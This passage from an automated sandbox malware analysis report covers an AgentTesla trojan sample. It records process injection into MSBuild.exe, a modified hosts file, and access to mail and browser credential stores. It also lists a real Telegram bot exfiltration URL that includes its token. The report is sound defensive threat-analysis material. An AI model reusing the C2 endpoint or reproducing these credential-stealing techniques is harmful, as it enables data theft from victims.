                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeQueries volume information: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeQueries volume information: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Modifies the hosts file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe PID: 6260, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6856, type: MEMORYSTR
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.313568492.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.312741390.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.311813738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe PID: 6260, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6856, type: MEMORYSTR
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: Yara matchFile source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6856, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe PID: 6260, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6856, type: MEMORYSTR
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.313568492.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.312741390.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.311813738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe PID: 6260, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6856, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts211
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		212
                    Process Injection                    		1
                    File and Directory Permissions Modification                    		1
                    OS Credential Dumping                    		114
                    System Information Discovery                    		Remote Services11
                    Archive Collected Data                    		Exfiltration Over Other Network Medium1
                    Web Service                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Native API                    		1
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		1
                    Disable or Modify Tools                    		211
                    Input Capture                    		1
                    Query Registry                    		Remote Desktop Protocol1
                    Data from Local System                    		Exfiltration Over Bluetooth11
                    Encrypted Channel                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts1
                    Scheduled Task/Job                    		Logon Script (Windows)1
                    Registry Run Keys / Startup Folder                    		1
                    Deobfuscate/Decode Files or Information                    		Security Account Manager211
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		Automated Exfiltration2
                    Non-Application Layer Protocol                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
                    Obfuscated Files or Information                    		NTDS2
                    Process Discovery                    		Distributed Component Object Model211
                    Input Capture                    		Scheduled Transfer3
                    Application Layer Protocol                    		SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script23
                    Software Packing                    		LSA Secrets131
                    Virtualization/Sandbox Evasion                    		SSH1
                    Clipboard Data                    		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Timestomp                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    Masquerading                    		DCSync1
                    Remote System Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job131
                    Virtualization/Sandbox Evasion                    		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)212
                    Process Injection                    		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                    Hidden Files and Directories                    		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 620228 Sample: SecuriteInfo.com.Trojan.MSI... Startdate: 04/05/2022 Architecture: WINDOWS Score: 100 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 10 other signatures 2->45 6 SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe 3 2->6         started        10 ykVBUY.exe 2 2->10         started        12 ykVBUY.exe 1 2->12         started        process3 file4 23 SecuriteInfo.com.T...Q.MTB.14730.exe.log, ASCII 6->23 dropped 47 Writes to foreign memory regions 6->47 49 Injects a PE file into a foreign processes 6->49 14 MSBuild.exe 17 4 6->14         started        19 conhost.exe 10->19         started        21 conhost.exe 12->21         started        signatures5 process6 dnsIp7 29 api.telegram.org 149.154.167.220, 443, 49768 TELEGRAMRU United Kingdom 14->29 25 C:\Users\user\AppData\Roaming\...\ykVBUY.exe, PE32 14->25 dropped 27 C:\Windows\System32\drivers\etc\hosts, ASCII 14->27 dropped 31 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->31 33 Tries to steal Mail credentials (via file / registry access) 14->33 35 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->35 37 5 other signatures 14->37 file8 signatures9

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe26%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe0%VirustotalBrowse
                    C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe0%MetadefenderBrowse
                    C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe0%ReversingLabs

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    9.0.MSBuild.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                    9.0.MSBuild.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                    9.0.MSBuild.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File
                    9.0.MSBuild.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                    9.2.MSBuild.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    9.0.MSBuild.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    https://api.telegram.org40%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://UhwhaG.com0%Avira URL Cloudsafe
                    http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.telegram.org
                    		149.154.167.220
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocumentfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://www.apache.org/licenses/LICENSE-2.0SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designersGSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers/?SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bTheSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://api.telegram.orgMSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designers?SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwMSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.tiro.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designersSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.goodfont.co.krSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocumentdocument-----MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.carterandcone.comlSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sajatypeworks.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.typography.netDSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cn/cTheSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://fontfabrik.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.founder.com.cn/cnSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://api.telegram.org4MSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/frere-user.htmlSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.jiyu-kobo.co.jp/SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://UhwhaG.comMSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://DynDns.comDynDNSnamejidpasswordPsi/PsiMSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
